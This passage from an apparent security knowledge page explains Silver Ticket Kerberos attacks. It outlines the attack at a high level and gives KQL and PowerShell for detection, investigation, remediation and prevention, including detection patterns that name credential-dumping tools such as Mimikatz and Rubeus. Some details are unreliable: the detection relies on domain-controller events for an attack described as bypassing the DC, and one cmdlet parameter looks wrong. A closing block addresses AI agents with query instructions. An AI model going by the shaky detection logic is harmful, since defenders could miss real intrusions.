Hash is a Crown Jewel:** Protect it at all costs. * **Golden Ticket = Unlimited Access:** Immediate remediation is critical. * **Reset KRBTGT Twice:** Ensure old tickets are invalidated. * **Continuous Monitoring:** Monitor Event IDs 4768, 4769, and ticket anomalies. * **Least Privilege:** Limit Domain Admin account access and usage. *** ## 🚨 **Silver Ticket Attack** ### πŸ” **1. Attack Breakdown** #### πŸ“ **What is a Silver Ticket Attack?** * A **Silver Ticket** attack is a Kerberos attack where an attacker **forges a Ticket Granting Service (TGS) ticket** for a specific **service** on a server. * Unlike **Golden Ticket** attacks, which target the **KRBTGT account hash**, **Silver Ticket attacks target service account hashes (e.g., SQL Server, CIFS, HTTP, etc.)**. #### πŸ“‘ **Why Attackers Use Silver Tickets?** * **No Domain Controller Communication:** The forged TGS is validated directly by the target service, bypassing the Domain Controller. * **Service-Level Access:** Attackers gain direct access to the specific service they target. * **Stealth:** Since it bypasses the Domain Controller, detection is more difficult. * **Persistence:** Valid TGS tickets can grant long-term access if service account passwords are not changed. *** #### πŸ“Œ **Attack Steps:** 1️⃣ **Enumerate Service Accounts:** Identify service accounts (e.g., CIFS, MSSQLSvc, HTTP) using tools like **PowerView** or **ADExplorer**.\ 2️⃣ **Extract Service Account Hash:** Use tools like **Mimikatz**, **Impacket**, or **Rubeus** to dump the NTLM hash of the target service account.\ 3️⃣ **Forge TGS Ticket:** Generate a fake TGS using the extracted hash with tools like **Mimikatz** or **Rubeus**.\ 4️⃣ **Inject the Ticket:** Inject the forged ticket into the current session.\ 5️⃣ **Access the Target Service:** Authenticate to the service using the forged ticket. *** #### πŸ“Š **Common Tools for Silver Ticket Attacks** | **Tool** | **Purpose** | | -------------- | ----------------------------------- | | **Mimikatz** | Create and inject Silver Tickets | | **Rubeus** | Kerberos ticket manipulation | | **Impacket** | Exploit service tickets and hashes | | **PowerView** | Enumerate AD services and accounts | | **Kerberoast** | Extract service account credentials | *** ### πŸ›‘οΈ **2. Detection Techniques** #### πŸ“Š **Manual Detection with PowerShell** **πŸ•΅οΈ Check Service Tickets with Suspicious Properties** ```powershell klist tickets ``` * Look for: * **Unusually long ticket lifetimes** * **Unexpected usernames** * **Odd service names** **πŸ•΅οΈ Monitor Event Logs for TGS Requests (Event ID 4769)** * Open **Event Viewer β†’ Security β†’ Filter by Event ID 4769** * Look for: * **Encryption Type:** `RC4-HMAC (0x17)` (often used in Silver Ticket attacks) * **Service Name:** Unusual or high-value services (e.g., `MSSQLSvc`, `CIFS`) **πŸ•΅οΈ Inspect NTLM Hashes** * Check for hash extraction activities: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4662} ``` *** #### πŸ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **πŸ•΅οΈ Detect Suspicious Service Ticket Requests** ```kusto SecurityEvent | where EventID == 4769 | where TicketEncryptionType == "0x17" // RC4-HMAC | where ServiceName in ("MSSQLSvc", "CIFS", "HTTP") | project Timestamp, DeviceName, AccountName, ServiceName, IpAddress ``` **πŸ•΅οΈ Identify Forged Tickets (No Pre-Authentication)** ```kusto SecurityEvent | where EventID == 4769 | where FailureReason == "Pre-authentication not required" | project Timestamp, DeviceName, AccountName, ServiceName, IpAddress ``` **πŸ•΅οΈ Look for Mimikatz/Rubeus Indicators** ```kusto DeviceProcessEvents | where FileName in~ ("mimikatz.exe", "rubeus.exe") | where ProcessCommandLine contains "silver" | project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Detect Anomalous Ticket Lifetimes** ```kusto SecurityEvent | where EventID == 4769 | where TicketOptions contains "0x40810000" | where AccountName != "krbtgt" | project Timestamp, DeviceName, AccountName, TicketOptions, ServiceName ``` *** #### πŸ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | ------------------------------------------------ | | **4769** | Service Ticket Request | | **4624** | Account Logon | | **4771** | Kerberos Pre-authentication failed | | **4662** | Object Access (Indicates potential hash dumping) | **πŸ“Œ Focus on Event ID 4769:** * Look for **Service Name** anomalies. * Monitor **RC4-HMAC Encryption** usage. * Look for **large ticket lifetimes**. *** ### πŸ•΅οΈ **3. Investigation Techniques** #### 1️⃣ **Validate TGS Ticket Requests** * Check accounts frequently requesting TGS tickets for specific services: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} ``` #### 2️⃣ **Identify Hash Dumping Activities** * Look for NTLM hash dumps: ```powershell Get-EventLog -LogName Security -InstanceId 4662 | Select-String "NTLM" ``` #### 3️⃣ **Trace Service Account Usage** * Monitor service account activity: ```powershell Get-ADUser -Identity ServiceAccountName -Properties LastLogonDate ``` #### 4️⃣ **Analyze Service Ticket Lifetimes** * Compare standard ticket lifetimes with anomalies: ```powershell klist tickets ``` #### 5️⃣ **Validate Source IP Addresses** * Identify anomalous IP addresses requesting tickets: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | Select-Object IpAddress ``` *** ### πŸ”§ **4. Remediation Steps** #### πŸ“Œ **1. Reset Service Account Passwords** * Immediately reset the password of the affected service account: ```powershell Set-ADAccountPassword -Identity ServiceAccountName -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "StrongP@ssw0rd!" -Force) ``` #### πŸ“Œ **2. Revoke Compromised Tickets** * Invalidate existing Kerberos tickets: ```powershell klist purge ``` #### πŸ“Œ **3. Monitor Service Accounts** * Enable auditing on high-value service accounts. #### πŸ“Œ **4. Rotate Service Account Passwords Periodically** * Use **Managed Service Accounts (gMSA)** for automated password management. #### πŸ“Œ **5. Terminate Malicious Processes** * Stop any malicious tools still running: ```powershell Stop-Process -Name "mimikatz" -Force ``` #### πŸ“Œ **6. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### πŸ›‘οΈ **5. Prevention Steps** 1. **Enable AES Encryption for Kerberos:** ```powershell Set-ADAccountControl -Identity ServiceAccountName -KerberosEncryptionType AES256 ``` 2. **Limit Service Account Privileges:** * Use **least privilege principle** for service accounts. 3. **Enable Logging and Auditing:** * Ensure **Event IDs 4769, 4624, 4771, and 4662** are actively monitored. 4. **Monitor Service Account Usage:** * Look for **unusual login patterns** or **ticket requests**. 5. **Restrict Admin Access:** * Limit access to tools like **Mimikatz**, **Rubeus**, and **Impacket**. 6. **Educate Security Teams:** * Train teams to identify **Kerberos anomalies** in event logs. *** ### 🧠 **6. Key Takeaways** * **Service Account Security:** Rotate and secure service account passwords regularly. * **Monitor RC4-HMAC Encryption:** It’s a common indicator of Silver Ticket attacks. * **Focus on TGS Tickets:** Monitor ticket requests for abnormal lifetimes or pre-authentication failures. * **Regular Audits:** Review high-privilege service accounts regularly. *** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmedhat.gitbook.io/whoami/attacks-and-detections/part-2.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.